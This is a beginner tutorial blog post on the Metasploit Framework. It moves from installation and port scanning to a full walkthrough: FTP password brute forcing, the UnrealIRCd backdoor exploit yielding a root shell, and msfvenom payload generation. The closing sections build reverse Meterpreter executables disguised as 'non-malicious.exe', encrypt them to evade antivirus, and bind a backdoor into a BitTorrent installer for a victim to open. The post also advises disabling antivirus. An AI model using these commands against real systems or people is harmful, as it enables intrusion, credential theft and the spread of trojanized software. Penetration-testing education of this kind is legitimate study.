Metasploit Framework is the undisputed king in the Penetration Testing industry with its many different functionalities and ease of use. Because it is the undisputed king in Penetraton Testing is the reason why we have put together a tutorial to help you get started quickly that is created just for beginners.
Its a free and open source framework built in Ruby programming language having both Command Line Interface (msfcli) and Graphical User Interface (Armitage). It also has a web interface, console interface (msfconsole) and an API (msgrpc) that can be used for automation with programming languages like Python. It has community and developers support and is under development for years with new modules and features coming everyday. The reason why the Metasploit Framework is considered the best tool in Penetration Testing because it has everything required for three pentest phases i.e, Enumeration, Exploitation and Post-exploitation.
A successful penetration test is carried out by using the right set of tools and methodologies by pentester. A penetration test consists of several phases including Information Gathering, Enumeration, Exploitation and Privilege Escalation. During penetration test, its not easy to manually download and run different exploits, scripts and tools separately. Metasploit doesn’t just consist of some bunch of exploits, it has every module that can aid in every phase of a successful Penetration Test. Metasploit offers an extensive Exploit development environment, a wide range of exploits and auxiliary modules that help in reconnaissance and enumeration phases.
Metasploit Framework comes pre-installed in Linux Security distributions like Kali Linux, Parrot Security OS, Black Arch etc but if you’re on Windows or using some other Linux distro like Ubuntu, then you have to manually install it. For Windows, you can download it from the following link https://windows.metasploit.com/metasploitframework-latest.msi.
WARNING: Metasploit setup contains a large number of exploits and backdoor scripts that are flagged malicious by antivirus programs, so be sure to turn off antivirus protection for testing purposes.
For Ubuntu and other Linux distributions, the best method to install Metasploit is by using Kali Linux repositories. Type the following commands to install it
azad@ubuntu:~$ wget -q -O - archive.kali.org/archive-key.asc | sudo apt-key add - azad@ubuntu:~$ echo deb http://mirrors.ocf.berkeley.edu/kali kali-rolling main non-free contrib >> /etc/apt/sources.list azad@ubuntu:~$ sudo apt update azad@ubuntu:~$ sudo apt install metasploit-framework postgresql -y
WARNING: don’t run “sudo apt upgrade” with Kali repositories in your “sources.list” file, it might crash your Linux distribution.
After installation, configure Metasploit and start Postgresql database service
azad@ubuntu:~$ sudo msfdb init [i] Database already started [+] Creating database user 'msf' [+] Creating databases 'msf' [+] Creating databases 'msf_test' [+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml' [+] Creating initial database schema // Enables postgresql service to start whenn Linux boots up azad@ubuntu:~$ sudo update-rc.d postgresql enable // Start postgresql service azad@ubuntu:~$ sudo service postgresql start
Now that Metasploit has been installed and setup, we can further explore its services and features and how we can use it in a penetration test.
According to their functionality, Metasploit has three major types of modules i.e, auxiliaries, exploits and post-exploit modules. Auxiliary modules can be used for scanning, service enumeration, fingerprinting and brute forcing different services while exploit modules contain the exploit codes to get the access of the remote systems, softwares and services. Post exploitation modules, on the other hand, are used when you have initial access to the system with low privilege and you want to escalate your privileges to admin level or want to leave a backdoor for more persistent access. Other than these, Metasploit also has some payload modules for different languages and Operating systems, it also has some encoders, encrypters and evasion modules that help in anti-virus evasion. There is a Metasploit utility “msfvenom” which is entirely dedicated to generating and encoding payloads for different languages and Operating systems but we’ll discuss it at the end of this article.
Auxiliary modules in Metasploit help in information gathering, service identification and enumeration of the remote systems and services. They are not exploits but they do a great help in information gathering which eventually leads to better exploitation and penetration testing. Auxiliary modules can be used for port scanning, brute forcing, service identification and enumeration. Here we’ll have a brief overview of what auxiliary modules are capable of
Metasploit has db_nmap module that uses Nmap for port scanning and saves the result to postgresql database. You can use db_nmap as same as you use Nmap
//Start Metasploit Framework console by typing msfconsole $ sudo msfconsole ...snip... msf5 > db_nmap -sV 192.168.18.1 [*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-22 17:05 PKT [*] Nmap: Nmap scan report for _gateway (192.168.18.1) [*] Nmap: Host is up (0.0023s latency). [*] Nmap: Not shown: 995 closed ports [*] Nmap: PORT STATE SERVICE VERSION ...snip... [*] Nmap: 23/tcp filtered telnet [*] Nmap: 53/tcp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7) [*] Nmap: 80/tcp open ssl/http ...snip... [*] Nmap: MAC Address: 00:00:00:00:00:FB (Unknown) [*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7 [*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 107.66 seconds
Other than db_nmap, it also has some custom port scanning modules that can be used within Metasploit. These are some auxiliary modules that can be used for port scanning
msf5 > grep auxiliary search portscan 0 auxiliary/scanner/http/wordpress_pingback_access normal No WordPress Pingback Locator 1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner 2 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner 3 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner 4 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner 5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner 6 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner 7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
Let’s use “auxiliary/scanner/portscan/tcp” module to scan for open TCP ports. Its similar to nmap scan with “-sT” option enabled. To use this module, type “use” command with module address.
msf5 > use auxiliary/scanner/portscan/tcp msf5 auxiliary(scanner/portscan/tcp) > show options Module options (auxiliary/scanner/portscan/tcp): Name Current Setting Required Description ---- --------------- -------- ----------- CONCURRENCY 10 yes The number of concurrent ports to check per host ...snip... PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'f ile:<path>' THREADS 1 yes The number of concurrent threads (max one per host) TIMEOUT 1000 yes The socket connect timeout in milliseconds // use the "RHOSTS" option to set the IP Address of the remote machine which ports you want to scan msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.18.7 rhosts => 192.168.18.7 // use "run" or "exploit" command to start the module. msf5 auxiliary(scanner/portscan/tcp) > run [+] 192.168.18.7: - 192.168.18.7:22 - TCP OPEN [+] 192.168.18.7: - 192.168.18.7:443 - TCP OPEN [+] 192.168.18.7: - 192.168.18.7:902 - TCP OPEN [+] 192.168.18.7: - 192.168.18.7:7070 - TCP OPEN [*] 192.168.18.7: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
So Metasploit is another excellent Framework that can be used for port scanning. Similarly, you can use its other port scanning modules as well if you don’t have Nmap installed on your machine.
For brute forcing services, Hydra, Medusa and sometimes Nmap is used. But Metasploit also has some great reliable modules that do the same. You can brute force a lot of Network services using Metasploit including but not limited to MSSQL, MySQL, VNC, telnet, SMTP, HTTP, SSH, FTP etc. Here we’ll try to brute force FTP using Metasploit as an example. We’ll use default Metasploit dictionaries location in “/usr/share/wordlists/metasploit/”
msf5 > grep login search ftp 26 auxiliary/scanner/ftp/ftp_login normal No FTP Authentication Scanner msf5 > use auxiliary/scanner/ftp/ftp_login msf5 auxiliary(scanner/ftp/ftp_login) > show options Module options (auxiliary/scanner/ftp/ftp_login): Name Current Setting Required Description ---- --------------- -------- ----------- ...snip... PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 21 yes The target port (TCP) STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host ...snip... USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts
As you can see that this module requires the remote server’s IP Address, Port number (21 is default for FTP), a user file and a password file for brute force. We can give this input to Metasploit using “set” command
msf5 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.18.16 RHOSTS => 192.168.18.16 msf5 auxiliary(scanner/ftp/ftp_login) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt USER_FILE => /usr/share/wordlists/metasploit/unix_users.txt msf5 auxiliary(scanner/ftp/ftp_login) > set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt PASS_FILE => /usr/share/wordlists/metasploit/unix_passwords.txt
Now we can start this module by typing “run” command. After running, this module will try each username and password combination until the correct username and password pair is found.
msf5 auxiliary(scanner/ftp/ftp_login) > exploit [*] 192.168.10.186:21 - 192.168.10.186:21 - Starting FTP login sweep [!] 192.168.10.186:21 - No active DB -- Credential data will not be saved! [-] 192.168.10.186:21 - 192.168.10.186:21 - LOGIN FAILED: 4Dgifts:msfadmin (Incorrect: ) [+] 192.168.10.186:21 - 192.168.10.186:21 - Login Successful: msfadmin:msfadmin [-] 192.168.10.186:21 - 192.168.10.186:21 - LOGIN FAILED: 4Dgifts:admin (Incorrect: ) [-] 192.168.10.186:21 - 192.168.10.186:21 - LOGIN FAILED: 4Dgifts:123456 (Incorrect: )
You can see the correct combination of username and password (msfadmin:msfadmin) was found using brute force.
Metasploit Framework has a large collection of exploit modules (located in “/usr/share/metasploit-framework/modules/exploits/”) which can be used to hunt backdoors, vulnerabilities, mis-configurations in remote softwares and services. You can write your own exploit modules for Metasploit in Ruby programming language or you can make changes to an existing exploit using “edit” command. Let’s exploit a vulnerability in UnrealIRCd using Metasploit as an example, we’ll start it off by running an Nmap scan.
msf5 > db_nmap -A 192.168.10.186 Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-23 18:41 PKT Nmap scan report for 192.168.10.186 Host is up (0.00018s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION ...snip... 6000/tcp open X11 (access denied) 6667/tcp open irc UnrealIRCd 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_ajp-methods: Failed to get a valid response for the OPTION request ...snip...
Nmap scan shows that there are multiple ports open including “6667” port running “UnrealIRCd” software. To see whether we can exploit it using Metasploit, we can use “search” command to see related auxiliary and exploit modules.
msf5 > search ircd Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 184.108.40.206 Backdoor Command Execution
It found one exploit in the database, let’s give it a try and see how it works
msf5 auxiliary(scanner/ftp/ftp_login) > use exploit/unix/irc/unreal_ircd_3281_backdoor msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 6667 yes The target port (TCP)
The port is the same as default, we just need to change the remote IP Address using “RHOSTS” options
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 192.168.10.186 rhosts => 192.168.10.186
Now we can start this module by typing “run”
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run [*] Started reverse TCP double handler on 192.168.10.182:4444 [*] 192.168.10.186:6667 - Connected to 192.168.10.186:6667... :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead [*] 192.168.10.186:6667 - Sending backdoor command... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo GvLWs1XGGI5jhYLz; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "GvLWs1XGGI5jhYLz\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.10.182:4444 -> 192.168.10.186:56944) at 2019-12-23 18:42:38 +0500 whoami && id root uid=0(root) gid=0(root)
and Metasploit’s exploit module successfully exploited this vulnerability and presented us with the remote shell of the victim machine. Using the same method, you can use hundreds of exploits present in Metasploit to exploit vulnerabilities of remote systems
Msfvenom is a Metasploit utility that is used to generate shell codes and backdoors supporting almost every operating system and language. Its a combination of “msfpayload” and “msfencode” that can be used to generate shell codes, and to encode/encrypt the shell code. You can see supported languages and output formats using the following command,
Framework Executable Formats [--format <value>] =============================================== Name ---- asp aspx aspx-exe dll elf elf-so exe ...snip... Framework Transform Formats [--format <value>] ============================================== Name ---- bash c csharp hex java num perl ...snip...
Using msfvenom you can generate backdoors for Windows, Linux, Mac OS and other Unix like operating systems. In this example, we’ll generate a payload for Windows operating system (x64 bit) using msfvenom
azad@azad:~$ sudo msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=[Attacker's IP] LPORT=1337 -f exe > non-malicious.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 206403 bytes Final size of exe file: 212992 bytes azad@azad:~$ file non-malicious.exe non-malicious.exe: PE32+ executable (GUI) x86-64, for MS Windows
You can also specify encoders and encrypters with your payload. The purpose of encoders and encrypters is to change the payload in a way that anti-virus solution couldn’t detect its signature. But the use encoders is useless now-a-days because anti virus solutions have become very mature. On the other hand, encryption of the payload makes the detection ratio much better. To try msfvenom’s encoding, type
azad@azad:~$ sudo msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -f exe > non-mali cious.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 494 (iteration=0) x86/shikata_ga_nai chosen with final size 494 Payload size: 494 bytes Final size of exe file: 73802 bytes
For encryption, there are 4 encryption algorithm options available in msfvenom.
azad@azad:~$ sudo msfvenom --list encrypt Framework Encryption Formats [--encrypt <value>] ================================================ Name ---- aes256 base64 rc4 xor
We’ll choose rc4 with the option “–encrypt” and then supply the encryption key using “–encrypt-key” option. Using this method, our payload will be encrypted using rc4 encryption, and will be decrypted when run on the victim machine. This encryption will help it evade the statis analysis of anti-virus solutions.
azad@azad:~$ sudo msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=1337 --encrypt rc4 --encrypt-key "s3cr4t_k3y" -f exe > non-malicious.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload No encoder or badchars specified, outputting raw payload Payload size: 660 bytes Final size of exe file: 73802 bytes
In this way, you can generate payloads for variety of operating systems with multiple options.
Msfvenom also has an option “-x” which can be used to bind your malicious backdoors with legit software executable files. The output would be legit looking executable but when run on the victim machine, it’ll run the original software as well as our backdoor as a service. As an example, we’ll try to backdoor a bittorrent installation executable with our backdoor. Let’s locate it in our directory.
azad@azad:~$ file BitTorrent.exe BitTorrent.exe: PE32 executable (GUI) Intel 80386, for MS Windows //specify LHOST, LPORT and other options azad@azad:~$ sudo msfvenom -p windows/meterpreter/reverse_https -x BitTorrent.exe -k LHOST=127.0.0.1 LPORT=1337 -f exe -o BitTorrent-1.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 566 bytes Final size of exe file: 168960 bytes Saved as: BitTorrent-1.exe azad@azad:~$ ls BitTorrent-1.exe BitTorrent-1.exe
Our malicious shell code is embedded with the BitTorrent exe file. When victim will open this executable, BitTorrent software will run as the same but it’ll also start our malicious backdoor service. Then you can run commands remotely on the victim machine using Metasploit’s “multi/handler” and perform further exploitation.